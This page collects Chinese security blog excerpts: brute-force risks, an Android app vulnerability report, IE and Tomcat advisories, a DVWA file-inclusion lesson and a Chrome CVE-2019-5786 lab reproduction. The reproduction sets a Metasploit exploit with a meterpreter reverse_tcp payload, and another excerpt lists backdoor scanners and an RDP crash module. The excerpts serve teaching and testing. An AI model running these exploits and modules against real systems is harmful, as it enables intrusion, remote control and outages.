漏洞

网站安全检测之逻辑漏洞检测 修复方案

寵の児 提交于 2020-02-28 17:14:19
网站安全是整个网站运营中最重要的一部分,网站没有了安全,那用户的隐私如何保障,在网站中进行的任何交易,支付,用户的注册信息都就没有了安全保障,所以网站安全做好了,才能更好的去运营一个网站,我们SINE安全在对客户进行网站安全部署与检测的同时,发现网站的业务逻辑漏洞很多,尤其暴利破解漏洞。 网站安全里的用户密码暴利破解,是目前业务逻辑漏洞里出现比较多的一个网站漏洞,其实暴力破解简单来说就是利用用户的弱口令,比如123456,111111,22222,admin等比较常用的密码,来进行猜测并尝试登陆网站进行用户密码登陆,这种攻击方式,如果网站在设计当中没有设计好的话,后期会给网站服务器后端带来很大的压力,可以给网站造成打不开,以及服务器瘫痪等影响,甚至有些暴力破解会利用工具,进行自动化的模拟攻击,线程可以开到100-1000瞬时间就可以把服务器的CPU搞爆,大大的缩短了暴力破解的时间甚至有时几分钟就可以破解用户的密码。 在我们SINE安全对客户网站漏洞检测的同时,我们都会去从用户的登录,密码找回,用户注册,二级密码等等业务功能上去进行安全检测,通过我们十多年来的安全检测经验,我们来简单的介绍一下。 首先我们来看下,暴力破解的模式,分身份验证码模块暴利破解,以及无任何防护,IP锁定机制,不间断撞库,验证码又分图片验证码,短信验证码,验证码的安全绕过,手机短信验证码的爆破与绕过等等几大方面

(最新)移动App应用安全漏洞分析报告 !

淺唱寂寞╮ 提交于 2020-02-28 15:58:39
  漏洞扫描方式主要分为静态和动态,静态扫描的漏洞类型主要包含SQL注入风险、webview系列、文件模式配置错误、https不校验证书、database配置错误等。动态扫描的漏洞类型主要包含拒绝服务攻击、文件目录遍历漏洞、file跨域访问等。   本报告选取11类android app中同等数量的热门app,其活跃用户量可覆盖83%的移动端网民,根据阿里巴巴移动安全中心对这些app的漏洞检测,得到以下结论:   参与检测的android app中,近97%的app都存在漏洞问题,且平均漏洞量高达40个。   安全类app漏洞问题最多,其漏洞总量499个,占所有类别app漏洞总量的21%。   新闻、旅游类app相对最不安全,其各自漏洞总量约240个,且其中高危漏洞量占比30%。   游戏类app相对最安全,漏洞总量约57个,且其中高危漏洞占比约2%。   从测试结果来看,android app的安全问题不容乐观,漏洞的存在尤其是高危漏洞,会对app开发者甚至用户带来较大影响,如何提前发现潜在风险、保护开发者和用户的利益是阿里巴巴移动安全团队一直坚持的责任。   第一章 Android APP漏洞现状   为了解android app的总体现状,报告中将app归纳为11个类别:健康、娱乐、安全、教育、新闻、旅游、游戏、社交、购物、金融、阅读。选取11类app中等量热门app

CVE-2019-5786漏洞复现

流过昼夜 提交于 2020-02-28 14:46:58
漏洞影响范围: CVE-2019-5786适用于Windows 7 x86的Chrome 72.0.3626.119稳定FileReader UaF攻击。 环境 kali win7 x86 Google_Chrome_(32bit)_v72.0.3626.119 复现 kali启动msf,搜索chrome_filereader利用模块 root@kali:~# msfconsole -q msf5 > search chrome_filereader 选择模块,查看模块信息 msf5 > use exploit/windows/browser/chrome_filereader_uaf msf5 exploit(windows/browser/chrome_filereader_uaf) > info 漏洞介绍 选择payload msf5 exploit(windows/browser/chrome_filereader_uaf) > set payload windows/meterpreter/reverse_tcp 设置payload参数,LHOST设置为kali ip msf5 exploit(windows/browser/chrome_filereader_uaf) > set URIPATH / msf5 exploit(windows/browser/chrome

Internet Explorer OnBeforeDeactivate事件远程代码执行漏洞

我只是一个虾纸丫 提交于 2020-02-28 13:42:17
Bugtraq ID: CVE ID: CVE-2012-1878 CNCVE ID:CNCVE-20121878 漏洞发布时间:2012-06-12 漏洞更新时间:2012-06-12 漏洞起因 设计错误 危险等级 高 影响系统 Microsoft Internet Explorer 6.x Microsoft Internet Explorer 7.x Microsoft Internet Explorer 8.x Microsoft Internet Explorer 9.x 不受影响系统 危害 远程攻击者可以利用漏洞以应用程序上下文执行任意代码。 攻击所需条件 攻击者必须构建恶意WEB页,诱使用户解析。 漏洞信息 Microsoft Internet Explorer是一款流行的WEB浏览器。 Microsoft Internet Explorer 6到9处理"OnBeforeDeactivate"事件存在一个未明错误,允许攻击者以应用程序上下文执行任意代码。 由于IE不正确处理内存中的对象,攻击者构建恶意WEB页,诱使用户解析,可访问已删除对象而以应用程序上下文执行任意代码。 测试方法 临时解决方案: -配置Internet Explorer的Internet和本地Intranet安全域设置为"高",以拦截ActiveX控件和活动脚本。 -配置Internet

MSF(四):常用弱点扫描模块

若如初见. 提交于 2020-02-28 10:34:41
常用弱点扫描模块 安全牛学习Metasploit Framework笔记 (1)VNC弱密码破解 use auxiliary/scanner/vnc/vnc_login (2)判断目标服务器VNC是否可以无密码访问 use auxiliary/scanner/vnc/vnc_none_auth 注意:若是无密码,则会显示:supported : None, free access! (3)RDP(远程桌面)漏洞 use auxiliary/scanner/rdp/ms12_020_check 该模块只会检查目标是否存在该漏洞,不会攻击,因此,不会造成DoS攻击 use auxiliary/dos/windows/rdp/ms12_020_maxchannelids 该模块使用dos认证目标是否存在该漏洞,因此会对目标系统使用拒绝服务攻击,如果漏洞存在,会致其蓝屏重启。建议:关键服务系统不建议使用 (4)设备后门(juniper防火墙+使用ssh登陆,即有可能存在该漏洞,fortiner同理)发现可以使用shodan use auxiliary/scanner/ssh/juniper_backdoor use auxiliary/scanner/ssh/fortinet_backdoor (5)VMWare ESXi密码爆破 use auxiliary/scanner/vmware

WordPress 开放重定向漏洞

旧时模样 提交于 2020-02-28 06:46:22
漏洞名称: WordPress 开放重定向漏洞 CNNVD编号: CNNVD-201309-167 发布时间: 2013-09-13 更新时间: 2013-09-13 危害等级: 高危 漏洞类型: 输入验证 威胁类型: 远程 CVE编号: CVE-2013-4339 WordPress是WordPress软件基金会的一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。 WordPress 3.6及之前的版本中存在开放重定向漏洞,该漏洞源于程序使用HTTP重定向后没有正确过滤URLs。远程攻击者可借助特制的字符串利用该漏洞绕过既定的重定向限制。 目前厂商已经发布了升级补丁以修复此安全问题,补丁获取链接: http://wordpress.org/news/2013/09/wordpress-3-6-1/ 来源: wordpress.org 链接: http://wordpress.org/news/2013/09/wordpress-3-6-1/ 来源: core.trac.wordpress.org 链接: http://core.trac.wordpress.org/changeset/25324 来源: core.trac.wordpress.org 链接: http://core.trac.wordpress.org/changeset

CVE-2015-1635,MS15-034 漏洞测试

一笑奈何 提交于 2020-02-28 06:33:38
HTTP.sys远程执行代码漏洞(CVE-2015-1635,MS15-034) 远程执行代码漏洞存在于 HTTP 协议堆栈 (HTTP.sys) 中,当 HTTP.sys 未正确分析经特殊设计的 HTTP 请求时会导致此漏洞。 成功利用此漏洞的攻击者可以在系统帐户的上下文中执行任意代码。 https://technet.microsoft.com/zh-cn/library/security/MS15-034 漏洞出来了POC,测试如下: 影响版本: windows 2008 R2 windows sever 2012 windows 7 windows 8 8.1 安装IIS6.0以上。 (IIS version > 6.0) HTTP.sys不懂其他地方用不用,所以暂时只了解影响WEB服务器。 测试POC: 系统必假死或者蓝屏: wget --header="Range: bytes=18-18446744073709551615" http://192.168.200.49/welcome.png https://github.com/yanyueoo7/TestOne/blob/master/CVE-2015-1635.py #!/usr/bin/env python # -*- coding: utf-8 -*- #date 2015/04/20 #The IIS

tomcat-CNVD-2020-10487-漏洞处理

一笑奈何 提交于 2020-02-27 21:27:11
问题背景 2020年02月20日, 360CERT 监测发现 国家信息安全漏洞共享平台(CNVD) 收录了 CNVD-2020-10487 Apache Tomcat文件包含漏洞 Tomcat是由Apache软件基金会属下Jakarta项目开发的Servlet容器,按照Sun Microsystems提供的技术规范,实现了对Servlet和JavaServer Page(JSP)的支持。由于Tomcat本身也内含了HTTP服务器,因此也可以视作单独的Web服务器。 CNVD-2020-10487是文件包含漏洞,攻击者可利用该漏洞读取或包含 Tomcat 上所有 webapp 目录下的任意文件,如:webapp 配置文件、源代码等。 问题来源 ajp13是一个二进制的TCP传输协议,相比HTTP这种纯文本的协议来说,效率和性能更高,也做了很多优化,但是,浏览器并不能直接支持AJP13协议,只支持HTTP协议,通过Apache的proxy_ajp模块进行反向代理,暴露成http协议给客户端访问。其他支持AJP协议的代理服务器当然也可以用这种做法。但是实际情况是,支持AJP代理的服务器非常少,比如目前很火爆的Nginx就没这个模块。因此tomcat的配置大部分都是关闭AJP协议端口的,因为除了Apache之外别的http server几乎都不能反代AJP13协议,自然就没太大用处了。

分析称苹果Mac OS将成下一个黑客攻击目标

半世苍凉 提交于 2020-02-27 20:23:55
随着 苹果 在世界范围内的 市场 占有率持续攀升并且逐渐在 商用领域 崭露头角,越来越多的 黑客 将目光投向苹果软件中的 漏洞 。   据Gartner提供的数据显示,2007年第四季度里苹果共销售了100万预装Mac OS X系统的电脑,远远超过了2006年同期的22.7万台销量。苹果在2007年的市场占有率超过6%,较2006年增加了28%。   在上周举行的Macworld展会上,苹果CEO史蒂夫-乔布斯(Steve Jobs)发表讲话称,苹果到目前为止已经销售了400万台iPhone手机和500万套Leopard(Mac OS X 10.5)操作系统,而且在未来销量将会进一步增加。   然而树大招风,产品卖的越多就越有可能遭到攻击。病毒专家和业内分析家说,苹果终端设备在全球热销使得人们开始密切关注其产品的安全性。   杀毒软件厂商McAfee安全研究部门经理David Marcus表示,市场份额并不总是可靠。病毒程序编写者根本不在乎用户使用的是什么系统,他们只在乎用户电脑里是否储存了有价值的信息以及是否有机会能窃取到这些信息。   David Marcus接着说,以前微软的Windows系统之所以受到如此多的病毒攻击,的确是因为其客户群体远比苹果Mac OS庞大。但是黑客们也了解苹果的发展势头,他们知道将会有越来越多的人购买苹果产品,其中还包括政府研究机构和商业公司

DVWA-File Inclusion

拈花ヽ惹草 提交于 2020-02-27 15:22:50
0x01 文件包含漏洞介绍 File Inclusion,意思是文件包含(漏洞),是指服务器开启allow_url_include选项时,就可以通过php的某些特性函数(include(),require()和include_once(),require_once())利用url去动态包含文件,此时如果没有对文件来源进行严格审查,就会导致任意文件读取或者任意命令执行。文件包含漏洞分为本地文件包含漏洞与远程文件包含漏洞,远程文件包含漏洞是因为开启了php配置中的allow_url_fopen选项(选项开启之后,服务器允许包含一个远程的文件)。 文件包含漏洞通常是配合文件上传进行webshell的获取。 文件包含漏洞利用: 1.本地文件包含 读取敏感文件。 2.远程文件包含 代码注入: 当服务器的php配置中,选项allow_url_fopen与allow_url_include为开启状态时,服务器会允许包含远程服务器上的文件,如果对文件来源没有检查的话,就容易导致远程代码执行 代码执行,需要配合文件上传漏洞利用。首先需要上传一个内容为php的文件,然后再利用file协议去包含上传文件(需要知道上传文件的绝对路径)。从而实现任意代码执行。 0x02 Low级别 代码如下: <?php // 用户希望显示的页面 $file = $_GET[ 'page' ]; ?> 对Low级别的学习